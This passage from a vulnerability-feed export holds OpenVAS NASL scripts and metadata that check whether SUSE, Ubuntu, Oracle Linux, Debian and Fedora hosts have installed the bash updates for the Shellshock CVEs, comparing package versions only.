script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:43", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for bash USN-2363-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841986", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841986", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2363_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bash USN-2363-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841986\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:26 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for bash USN-2363-2\");\n script_tag(name:\"insight\", value:\"USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch\nfor CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS\npackage. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nTavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"USN\", value:\"2363-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2363-2/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for bash USN-2363-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841987", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2363_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bash USN-2363-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841987\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:57:38 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for bash USN-2363-1\");\n script_tag(name:\"insight\", value:\"Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"USN\", value:\"2363-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2363-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|10\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2-2ubuntu2.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.1-2ubuntu3.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:44", "description": "Oracle Linux Local Security Checks ELSA-2014-3075", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3075", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123302", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123302", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3075.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123302\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:59 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3075\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3075 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3075\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3075.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.1.0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.1.0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:55", "description": "Oracle Linux Local Security Checks ELSA-2014-3077", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3077", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123301", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123301", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3077.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123301\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3077\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3077 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3077\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3077.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5.1.0.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:18", "description": "Oracle Linux Local Security Checks ELSA-2014-3076", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3076", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123300", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123300", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3076.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123300\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3076\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3076 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3076\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3076.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.2.0.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.2.0.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:48:52", "description": "Stephane Chazelas discovered a vulnerability in bash, the GNU\nBourne-Again Shell, related to how environment variables are\nprocessed. In many common configurations, this vulnerability is\nexploitable over the network, especially if bash has been configured\nas the system shell.", "cvss3": {}, "published": "2014-09-24T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3032-1 (bash - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:703032", "href": "http://plugins.openvas.org/nasl.php?oid=703032", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3032.nasl 6637 2017-07-10 09:58:13Z teissa $\n# Auto-generated from advisory DSA 3032-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703032);\n script_version(\"$Revision: 6637 $\");\n script_cve_id(\"CVE-2014-6271\");\n script_name(\"Debian Security Advisory DSA 3032-1 (bash - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-10 11:58:13 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-09-24 00:00:00 +0200 (Wed, 24 Sep 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3032.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bash on Debian Linux\");\n script_tag(name: \"insight\", value: \"Bash is an sh-compatible command language interpreter that executes\ncommands read from the standard input or from a file. Bash also\nincorporates useful features from the Korn and C shells (ksh and csh).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), this problem has been fixed in\nversion 4.2+dfsg-0.1+deb7u1.\n\nWe recommend that you upgrade your bash packages.\");\n script_tag(name: \"summary\", value: \"Stephane Chazelas discovered a vulnerability in bash, the GNU\nBourne-Again Shell, related to how environment variables are\nprocessed. In many common configurations, this vulnerability is\nexploitable over the network, especially if bash has been configured\nas the system shell.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:13", "description": "Check the version of bash", "cvss3": {}, "published": "2014-10-06T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-12202", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868358", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-12202\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868358\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-06 05:56:22 +0200 (Mon, 06 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-12202\");\n script_tag(name:\"summary\", value:\"Check the version of bash\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bash on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12202\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139900.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n 